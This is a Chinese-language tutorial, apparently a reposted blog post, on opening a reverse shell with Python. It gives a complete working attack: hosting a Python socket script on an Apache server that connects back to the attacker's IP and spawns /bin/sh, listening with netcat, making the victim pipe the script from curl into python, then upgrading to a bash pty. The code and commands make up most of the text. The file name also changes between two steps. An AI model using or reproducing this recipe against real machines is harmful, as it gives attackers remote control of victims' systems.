用python反彈shell
攻擊機:linux(本文章使用ubuntu)
受害主機:安裝了python的windows或者linux(本文章受害主機為kali linux)
1.配置環境:windows安裝python , python官網地址: www.python.org ;linux:sudo apt-get install python3
2.攻擊機開啟http服務,apt install -y apache2 ##本次實驗用apache
vi /etc/apache2/sites-enabled/000-default.conf ## 編輯此檔案,修改一下配置
<VirtualHost *:80> ## 其他行不變
DocumentRoot /var/www/html ## 瀏覽器訪問目錄
rm /var/www/html/index.html ##洗掉自帶主頁
/etc/init.d/apache2 restart ## 重啟apache服務
service apache2 status ## 查看apache2狀態,應為active(running)狀態
3.cd /var/www/html ## 切換到/var/www/html目錄下
touch reverse_python_shell.py ## 創建檔案
vi reverse_python_shell.py ## 編輯檔案
##.py檔案內容
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.106.139",9999)) #更改IP為自己的外網IP,埠自定義
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
*編輯完后按Esc,再按:,輸入wq,按回車
4.攻擊機要安裝netcat,輸入以下命令:
sudo apt-get -y install netcat-traditional
sudo update-alternatives --config nc
nc -lvvp 9999 ## 對9999埠進行監聽
5.在受害機上召喚出cmd,輸入:curl 192.168.106.139/reverse_py_shell.py | python ## 將檔案匯入python進行執行
6.反連成功,以下為攻擊機終端界面
*python -c ‘import pty;pty.spawn(“/bin/bash”)’ ## 因為已知目標主機安裝了python,所以可以引入pty終端庫,派生出bash ##bash是linux shell的一種,在bash中可以更方便的進行命令輸入
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/505281.html
標籤:其他